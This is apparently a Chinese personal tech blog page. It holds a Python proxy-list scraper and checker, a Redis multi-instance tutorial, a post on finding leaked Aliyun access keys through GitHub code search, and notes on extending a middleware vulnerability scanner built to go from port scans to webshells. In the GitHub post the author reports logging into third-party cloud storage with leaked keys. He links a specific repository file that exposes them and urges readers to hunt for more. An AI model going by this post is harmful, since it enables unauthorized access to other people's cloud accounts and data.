        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except Queue.Empty:
                break


class WorkManager:  # 线程池管理,创建
    def __init__(self, num_of_workers=10):
        self.workQueue = Queue.Queue()  # 请求队列
        self.resultQueue = Queue.Queue()  # 输出结果的队列
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # 创建工作线程
            self.workers.append(worker)  # 加入到线程队列

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # 从池中取出一个线程处理请求
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # 重新加入线程池中
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # 向工作队列中加入请求

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)

def check_proxies(ip,port):
    """
    检测代理存活率
    分别访问v2ex.com以及guokr.com
    """
    proxies={'http': 'http://'+str(ip)+':'+str(port)}
    try:
        r0 = requests.get('http://v2ex.com', proxies=proxies,timeout=30,verify=False)
        r1 = requests.get('http://www.guokr.com', proxies=proxies,timeout=30,verify=False)

        if r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and "09043258" in r1.content and "15015613" in r0.content:
            #r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and 
            print ip,port
            return True
        else:
            return False

    except Exception, e:
        pass
        #sys.stderr.write(str(e))
        #sys.stderr.write(str(ip)+"\t"+str(port)+"\terror\r\n")
        return False

def get_ip181_proxies():
    """
    http://www.ip181.com/获取HTTP代理
    """
    proxy_list = []
    try:
        html_page = requests.get('http://www.ip181.com/',timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
        jq = PyQuery(html_page)
        for tr in jq("tr"):
            element = [PyQuery(td).text() for td in PyQuery(tr)("td")]
            if 'HTTP' not in element[3]:
                continue

            result = re.search(r'\d+\.\d+', element[4], re.UNICODE)
            if result and float(result.group()) > 5:
                continue
            #print element[0],element[1]
            proxy_list.append((element[0], element[1]))
    except Exception, e:
        sys.stderr.write(str(e))
        pass

    return proxy_list

def get_kuaidaili_proxies():
    """
    http://www.kuaidaili.com/获取HTTP代理
    """
    proxy_list = []
    for m in ['inha', 'intr', 'outha', 'outtr']:
        try:
            html_page = requests.get('http://www.kuaidaili.com/free/'+m,timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    for n in range(0,11):
        try:
            html_page = requests.get('http://www.kuaidaili.com/proxylist/'+str(n)+'/',timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list

def get_66ip_proxies():
    """
    http://www.66ip.com/ api接口获取HTTP代理
    """
    urllists = [
        'http://www.proxylists.net/http_highanon.txt',
        'http://www.proxylists.net/http.txt',
        'http://www.66ip.cn/nmtq.php?getnum=1000&anonymoustype=%s&proxytype=2&api=66ip',
        'http://www.66ip.cn/mo.php?sxb=&tqsl=100&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1'
        ]
    proxy_list = []
    for url in urllists:
        try:
            html_page = requests.get(url,timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
            patterns = re.findall(r'((?:\d{1,3}\.){1,3}\d{1,3}):([1-9]\d*)',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list


def get_proxy_sites():
    wm = WorkManager(20)
    proxysites = []
    proxysites.extend(get_ip181_proxies())
    proxysites.extend(get_kuaidaili_proxies())
    proxysites.extend(get_66ip_proxies())

    for element in proxysites:
        wm.add_job(check_proxies,str(element[0]),str(element[1]))
    wm.start()
    wm.wait_for_complete()


if __name__ == '__main__':
    try:
        get_proxy_sites()
    except Exception as exc:
        print(exc)

Redis启动多端口,运行多实例

发布时间:July 21, 2016 // 分类:运维工作,linux,windows,转帖文章 // No Comments

使用redis在同一台机器上,启用多个端口,实现多个实例,完成集群的模拟实现。

  • 启动多实例

redis默认启动端口为6379,我们可以使用 --port 来指定多个端口,如下,在linux终端命令:

redis-server &
redis-server --port 6380 &
redis-server --port 6381 &
redis-server --port 6382 &

查看启动的redis实例:

ps -ef | grep redis

QQ截图20150401095044.png

  • 使用实例

使用其中一个redis实例:

root@iZ251fha7aeZ src]# redis-cli -p 6380

127.0.0.1:6380> keys '*'

(empty list or set)

127.0.0.1:6380> set foo hello

OK

127.0.0.1:6380> keys '*'

1) "foo"

127.0.0.1:6380> set foo1 hello

OK

127.0.0.1:6380> keys '*'

1) "foo1"

2) "foo"

127.0.0.1:6380> get foo1

"hello"

127.0.0.1:6380> 

完成了redis多端口,多实例的部署和使用了

  • 关闭实例

redis 的关闭如下:

redis-cli shutdown

指定端口实例

redis-cli -p 6380 shutdown

github搜索泄露的新姿势

发布时间:June 14, 2016 // 分类:工作日志,运维工作,代码学习,windows // 2 Comments

最开始的信息是来源于http://www.wooyun.org/bugs/wooyun-2016-0218766。看到其中关于ALIYUN_ACCESS_ID以及ALIYUN_ACCESS_KEY的信息泄露后直接利用oss的工具连接成功了。好奇心重的我顺便搜索了下关于oss的信息

直接在github里面搜索ALIYUN_ACCESS_ID或者ALIYUN_ACCESS_KEY抓到不少的信息

https://github.com/search?q=ALIYUN_ACCESS_ID&ref=searchresults&type=Code&utf8=%E2%9C%93

https://github.com/search?q=ALIYUN_ACCESS_KEY&ref=searchresults&type=Code&utf8=%E2%9C%93

测试了下

https://github.com/xukg/GeiliXinli/blob/6c7762b71514fd1a0ac52f7763f3ab18e0f778d5/app/src/main/java/com/geilizhuanjia/android/framework/utils/ConstantUtil.java

顺利成功的连接上了

还有更多~等待挖掘,比如淘宝储存代码的地方,oschina存放代码的地方= =

然后关于连接工具顺利的找到了两个版本[win+mac]

ossclient_mac.zip  ossclient_win.zip

中间件漏洞检测框架(F-MiddlewareScan)

发布时间:March 20, 2016 // 分类:开发笔记,工作日志,linux,windows,python,生活琐事 // 1 Comment

纯python编写的轻量级中间件漏洞检测框架,实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell 
参数说明 
-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),最多限制一次可扫描65535个IP。 
-p 指定要扫描端口列表,多个端口使用,隔开 例如:7001,8080,9999。未指定即使用内置默认端口进行扫描(80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080) 
-m 指定线程数量 默认100线程 
-t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 
 

漏洞检测脚本以插件形式存在,可以自定义添加修改漏洞插件,存放于plugins目录,插件标准非常简单,只需对传入的IP,端口,超时进行操作,成功返回“YES|要打印出来的信息”即可。 
新增插件需要在 plugin_config.ini配置文件中新增关联(多个漏洞插件以逗号隔开)。 
中间件识别在discern_config.ini文件中配置(支持文件内容和header识别) 

目前内置了19个漏洞插件,希望大家可以一起编写更多的插件,目前还缺少weblogic自动部署和反序列化探测以及中间件的反序列化自动获取webshell的插件等等。 

周末感冒无事,除了吃药意外就是发呆了。好友说想要修改一下,增加CMS识别以及同服查询的功能。动手开始做

def exploit(URL, Thread):
    w = cms.WhatWeb(URL, Thread)
    w.run()
    if w.result:
        return w.result

def whatcms(scan_type,task_host,task_port):
    task_port = '80'
    if task_host.find('http') == -1:
        URL = 'http://'+str(task_host)
    elif task_host.find('///') !=1 and task_host.find('~') == -1:
        URL = str(task_host.replace('///','://'))
    elif task_host.find('///') !=1 and task_host.find('~') != -1:
        URL = task_host.replace('///','://').replace('~',':').rstrip('/')
    log(scan_type,URL,task_port)
    Thread = 40
    try:
        r = requests.get(URL, timeout=15, verify=False)
        if r.status_code == 200:
            return exploit(URL, Thread)
    except Exception as e:
        #print str(e)
        return

def ip2host_get(scan_type,host,port):
    ip2hosts = []
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), timeout=45, verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item.replace('://','///').replace(':','~'))
    except Exception, e:
        print str(e)
        pass
    return ip2hosts

再次修改了其中的顺序,

    def run(self):
        while True:
            queue_task = self.queue.get()
            task_type,task_host,task_port = queue_task.split(":")
            if task_type == 'portscan':
                port_status = scan_port(task_type,task_host,task_port)
                if port_status == True:
                    #如果端口开发,推送到任务
                    queue.put(":".join(['ip2host_get',task_host,task_port]))
            elif task_type == 'ip2host_get':
                #针对存货IP发起旁站查询
                result = []
                urls = ip2host_get(task_type,task_host,task_port)
                #queue.put(":".join(['discern',task_host,task_port]))
                urls.insert(0,task_host)
                result.extend(urls)
                urls = list(set(result))
                if len(urls)>0:
                    #list can not use find
                    for url in urls:
                        if len(url)>0:
                            #print url
                            #put url in queue,but some qestion in Threads and queue
                            queue.put(":".join(['whatcms',str(url),task_port]))
            elif task_type == 'whatcms':
                cms = whatcms(task_type,task_host,task_port)
                queue.put(":".join(['discern',task_host,task_port]))
                if cms == None:
                    "go on 但是没什么乱用"
                    #以后增加插件式扫描

            elif task_type == 'discern':
                #针对中间件的识别
                discern_type = scan_discern(task_type,task_host,task_port)
                if discern_type:
                    queue.put(":".join([discern_type,task_host,task_port]))
            else:
                scan_vul(task_type,task_host,task_port)
            self.queue.task_done()

但是问题来了,线程经常性的奔溃掉,然后就无奈了

然后发现了一个有意思的东西https://raw.githubusercontent.com/erevus-cn/pocscan/master/web/tasks.py

# coding:utf-8
import gevent
from gevent.pool import Pool
from web.lib.utils import *
from pocscan.poc_launcher import Poc_Launcher
from celery import Celery, platforms

app = Celery()

# 允许celery以root权限启动
platforms.C_FORCE_ROOT = True

# 修改celery的全局配置
app.conf.update(
    CELERY_IMPORTS = ("tasks", ),
    BROKER_URL = 'amqp://guest:guest@localhost:5672/',
    CELERY_RESULT_BACKEND = 'db+mysql://root:123456@127.0.0.1:3306/pocscan',
    CELERY_TASK_SERIALIZER='json',
    CELERY_RESULT_SERIALIZER='json',
    CELERY_TIMEZONE='Asia/Shanghai',
    CELERY_ENABLE_UTC=True,
    BROKER_TRANSPORT_OPTIONS = {'visibility_timeout': 3600}, # 如果任务没有在 可见性超时 内确认接收,任务会被重新委派给另一个Worker并执行  默认1 hour.
    CELERYD_CONCURRENCY = 50 ,
    CELERY_TASK_RESULT_EXPIRES = 1200,  # celery任务执行结果的超时时间,我的任务都不需要返回结
    # BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True},       # 设置一个传输选项来给消息加上前缀
)

# 失败任务重启休眠时间300秒,最大重试次数5次
#@app.task(bind=True, default_retry_delay=300, max_retries=5)
@app.task(time_limit=3600)
def run_task_in_gevent(url_list, poc_file_dict):     # url_list 每个进程分配到一定量的url
    poc = Poc_Launcher()
    pool = Pool(100)
    for target in url_list:
        for plugin_type,poc_files in poc_file_dict.iteritems():
            for poc_file in poc_files:
                if target and poc_file:
                    target = fix_target(target)
                    pool.add(gevent.spawn(poc.poc_verify, target, plugin_type, poc_file))
    pool.join()

搜了下Celery,专门用于解决任务队列用于分发工作给不同线程。回头研究下

 

参考文章:

http://docs.jinkan.org/docs/celery/
http://my.oschina.net/u/2306127/blog/417360
http://rfyiamcool.blog.51cto.com/1030776/1325062
http://www.tuicool.com/articles/qi6Nve